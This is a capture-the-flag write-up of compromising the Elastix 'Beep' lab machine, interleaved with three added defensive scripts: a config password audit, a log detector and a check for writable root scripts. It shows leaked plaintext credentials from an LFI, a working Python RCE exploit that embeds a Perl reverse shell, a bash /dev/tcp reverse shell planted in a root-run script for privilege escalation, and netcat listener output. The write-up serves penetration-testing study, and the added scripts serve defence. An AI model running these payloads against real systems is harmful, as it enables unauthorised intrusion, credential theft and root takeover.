The first step, as with all machines, is to run an Nmap scan to identify the running services.
```
# Nmap 7.80 scan initiated Sun Aug 23 06:24:25 2020 as: nmap -oN scan -sV -O -p- -sC 10.10.10.7
Nmap scan report for 10.10.10.7
Host is up (0.033s latency).
Not shown: 65519 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp    open  http       Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: RESP-CODES IMPLEMENTATION(Cyrus POP3 server v2) LOGIN-DELAY(0) PIPELINING AUTH-RESP-CODE USER STLS UIDL APOP EXPIRE(NEVER) TOP
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: CONDSTORE CATENATE ACL CHILDREN OK URLAUTHA0001 X-NETSCAPE LITERAL+ LIST-SUBSCRIBED LISTEXT IDLE MULTIAPPEND MAILBOX-REFERRALS QUOTA NAMESPACE UIDPLUS Completed ID ANNOTATEMORE THREAD=REFERENCES RIGHTS=kxte THREAD=ORDEREDSUBJECT SORT SORT=MODSEQ IMAP4 RENAME UNSELECT NO BINARY IMAP4rev1 ATOMIC STARTTLS
443/tcp   open  ssl/https?
|_ssl-date: 2020-08-23T10:30:15+00:00; +2m01s from scanner time.
878/tcp   open  status     1 (RPC #100024)
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (included w/cyrus imap)
4445/tcp  open  upnotifyp?
4559/tcp  open  hylafax    HylaFAX 4.3.10
5038/tcp  open  asterisk   Asterisk Call Manager 1.1
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/23%OT=22%CT=1%CU=43276%PV=Y%DS=2%DC=I%G=Y%TM=5F42455
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=CE%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%TS=A)OPS(O
OS:1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11N
OS:W7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(R
OS:=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%
OS:RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0%
OS:Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%
OS:A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%
OS:DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIP
OS:L=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

Host script results:
|_clock-skew: 2m00s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 23 06:30:49 2020 -- 1 IP address (1 host up) scanned in 384.20 seconds
```
From here we can see there are numerous services running on the box, most notably a MySQL server, a mail server and a PBX. I started by browsing to port 80 and found that the Elastix server software was running. I attempted to log in with default credentials, but this was unsuccessful.
I did some searching for exploits against Elastix. It's difficult to tell from the login page which version of the software is running, so much of this is trial and error. I found the LFI exploit HERE, which allows you to read the amportal.conf configuration file. This file includes plaintext credentials for the Elastix web interface. It can be browsed to via the following link:
Inside this file is the following block of text, which includes the credentials for logging in to the Elastix web interface.
```
AMPDBHOST=localhost
AMPDBENGINE=mysql
# AMPDBNAME=asterisk
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPENGINE=asterisk
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
FOPWEBROOT=/var/www/html/panel
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
vtigerCRM adminL:jEhdIekWmdjE
```
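As an added, defender-side example (not part of the original write-up), the following script audits an amportal.conf-style file for the two problems the block above shows: one password shared by several services, and FreePBX defaults still in use. The config text is constructed from the values above; the key names and the default passwords are the ones visible on the page.

```python
# Added example (not part of the original write-up): audit an amportal.conf-style
# KEY=VALUE file for the weaknesses visible in the file above: one password
# reused for several services, and FreePBX default passwords still in use.
# SAMPLE_CONF is constructed for the demo from the values on the page.
import re
from collections import defaultdict

SAMPLE_CONF = """\
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
# AMPDBPASS=amp109
AMPDBPASS=jEhdIekWmdjE
AMPMGRUSER=admin
#AMPMGRPASS=amp111
AMPMGRPASS=jEhdIekWmdjE
#FOPPASSWORD=passw0rd
FOPPASSWORD=jEhdIekWmdjE
ARI_ADMIN_PASSWORD=jEhdIekWmdjE
"""

# Defaults seen commented out in the file above; one still active is a finding.
KNOWN_DEFAULTS = {"amp109", "amp111", "passw0rd"}
# Secret-bearing keys: anything ending in PASS or PASSWORD, commented or not.
SECRET_KEY = re.compile(r"^\s*(#\s*)?([A-Z_]*PASS(?:WORD)?)\s*=\s*(\S+)\s*$")

def parse_secrets(text):
    """Return {key: value} for active (uncommented) password keys."""
    secrets = {}
    for line in text.splitlines():
        m = SECRET_KEY.match(line)
        if m and not m.group(1):          # group 1 is set on commented-out lines
            secrets[m.group(2)] = m.group(3)
    return secrets

def audit_amportal(text):
    """Return finding strings: reused passwords and FreePBX defaults still live."""
    secrets = parse_secrets(text)
    findings = []
    by_value = defaultdict(list)
    for key, value in secrets.items():
        by_value[value].append(key)
    for value, keys in by_value.items():
        if len(keys) > 1:
            findings.append("reused password across " + ", ".join(sorted(keys)))
    for key, value in secrets.items():
        if value in KNOWN_DEFAULTS:
            findings.append("%s still set to FreePBX default" % key)
    return findings
```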
Next I found THIS exploit, which leverages the $to parameter in the callme_page.php page to provide remote code execution. By default this code would not work because of certificate errors on the login page. It had to be modified slightly to get around this, along with changing the lhost and rhost values. I also had to lower the minimum SSL version on my Kali machine by editing /etc/ssl/openssl.conf to accept TLSv1, and modify the extension number to match the one on the Beep machine. This can be gathered by logging in to the Elastix web interface, opening the PBX tab and finding the user Fanis Papafanopoulos with extension 233. The exploit code ultimately looked like the following:
```python
import urllib

rhost="10.10.10.7"
lhost="10.10.14.29"
lport=443
extension="233"

# Reverse shell payload
url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
urllib.urlopen(url)
```
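An added detection example (not from the original write-up or from the exploit's author): the following scans Apache access log lines for callme_page.php requests whose parameters carry CRLF-encoded Asterisk Manager headers, which is the injection the exploit above relies on. The log lines are constructed, with the command payload shortened to a harmless placeholder.

```python
# Added example (not part of the original write-up): detect attempts to abuse
# the callme_page.php 'callmenum' parameter in Apache access logs. The exploit
# smuggles CRLF-separated Asterisk Manager headers (Application: / Data:) into
# the extension number, so a decoded parameter should never contain a line
# break or an AMI header. The log lines below are constructed for the demo.
import re
from urllib.parse import urlsplit, parse_qs, unquote

SAMPLE_LOG = """\
10.10.14.29 - - [23/Aug/2020:10:31:02 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.10.14.29 - - [23/Aug/2020:10:31:09 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=233@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id%0D%0A%0D%0A HTTP/1.1" 200 512 "-" "Python-urllib/2.7"
10.10.14.29 - - [23/Aug/2020:10:31:15 +0000] "GET /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')
AMI_HEADER = re.compile(r"^(Application|Data|Action|Command)\s*:", re.I | re.M)

def inspect_request(path_and_query):
    """Return a reason if the request looks like callme_page.php CRLF injection, else None."""
    parts = urlsplit(path_and_query)
    if not parts.path.endswith("/callme_page.php"):
        return None
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for v in values:
            decoded = unquote(v)          # second decode catches double-encoded input
            if "\r" in decoded or "\n" in decoded:
                return "CRLF in parameter %r" % name
            if AMI_HEADER.search(decoded):
                return "AMI header in parameter %r" % name
    return None

def scan_access_log(text):
    """Return (client_ip, timestamp, reason) for each suspicious request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reason = inspect_request(m.group(3))
        if reason:
            hits.append((m.group(1), m.group(2), reason))
    return hits
```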
I then started a netcat listener on port 443, ran the exploit and received a shell on the listener. I upgraded the shell using Python to something a bit more workable, then browsed to the fanis user's home directory and captured the user flag.
```
kali@kali:/etc/ssl$ sudo nc -lvp 443
listening on [any] 443 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.7] 59571
python -c 'import pty; pty.spawn("/bin/bash")'
bash-3.2$ whoami
whoami
asterisk
bash-3.2$ cd /home
cd /home
bash-3.2$ ls
ls
fanis  spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat user.txt
cat user.txt
[REDACTED]
bash-3.2$
```
Next we have to escalate privileges to root. I ran "ps aux" to find which programs were currently running. The following process caught my eye: it was running as root, but the script file was owned by, and writable by, the asterisk user. This allows me to modify the file and then have it run as root to spawn a root reverse shell.
```
root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
```
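An added example (not part of the original write-up) that turns this finding into a check a defender could run: it parses ps aux output, resolves the script behind an interpreter, and reports root processes whose file a non-root account can modify. The process list and file metadata are constructed; uid 500 is a placeholder for the asterisk account.

```python
# Added example (not part of the original write-up): flag processes running as
# root whose executable or script is writable by a non-root user, the condition
# behind the elastix-updaterd escalation. The ps output and the file metadata
# are constructed so the check runs offline (uid 500 stands in for asterisk).
import stat

SAMPLE_PS = """\
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root      3571  0.0  0.1   4636  1168 ?        S    21:06   0:00 /bin/bash /etc/rc3.d/S91elastix-updaterd start
root      2210  0.0  0.0   2336   800 ?        Ss   21:05   0:00 /usr/sbin/sshd
asterisk  3600  0.2  1.4  32000 14000 ?        S    21:06   0:02 /usr/sbin/asterisk -f
"""

# path -> (owner uid, group gid, permission bits); constructed for the demo
SAMPLE_META = {
    "/etc/rc3.d/S91elastix-updaterd": (500, 500, 0o755),
    "/usr/sbin/sshd": (0, 0, 0o755),
    "/usr/sbin/asterisk": (0, 0, 0o755),
}

INTERPRETERS = ("/bin/sh", "/bin/bash", "/usr/bin/python", "/usr/bin/perl")

def script_path(command):
    """Return the file really being executed: the script when an interpreter wraps it."""
    argv = command.split()
    if not argv:
        return None
    if argv[0] in INTERPRETERS and len(argv) > 1:
        return argv[1]
    return argv[0]

def writable_by_non_root(meta):
    """True if someone other than root can change the file's contents."""
    uid, gid, mode = meta
    return bool(uid != 0 or (gid != 0 and mode & stat.S_IWGRP) or mode & stat.S_IWOTH)

def find_weak_root_processes(ps_text, file_meta):
    """Return [(pid, path)] for root processes executing a non-root-writable file."""
    hits = []
    for line in ps_text.splitlines()[1:]:
        fields = line.split(None, 10)       # COMMAND is the 11th field and may contain spaces
        if len(fields) < 11 or fields[0] != "root":
            continue
        path = script_path(fields[10])
        meta = file_meta(path) if path else None
        if meta and writable_by_non_root(meta):
            hits.append((int(fields[1]), path))
    return hits
```

On a live host, pass a file_meta function that wraps os.stat and returns (st_uid, st_gid, stat.S_IMODE(st_mode)), returning None for paths that do not exist.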
I started by modifying the file with the following reverse shell:
```bash
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.29/2600 0>&1
```
I then started a netcat listener on port 2600 on the Kali machine:
```
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
```
I then needed to find a way to start the elastix-updaterd process. After some trial and error I found that restarting the system through the Elastix web interface caused the elastix-updaterd script to run as the root user.
Once the reboot completed, I was presented with a shell on my netcat listener. From here I confirmed it was a root shell and was then able to cat the root flag.
```
kali@kali:~$ sudo nc -lvp 2600
listening on [any] 2600 ...
10.10.10.7: inverse host lookup failed: Unknown host
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.7] 47950
bash: no job control in this shell
bash-3.2# whoami
root
bash-3.2# cd /root
bash-3.2# ls
anaconda-ks.cfg
elastix-pr-2.2-1.i386.rpm
install.log
install.log.syslog
postnochroot
root.txt
webmin-1.570-1.noarch.rpm
bash-3.2# cat root.txt
[REDACTED]
bash-3.2#
```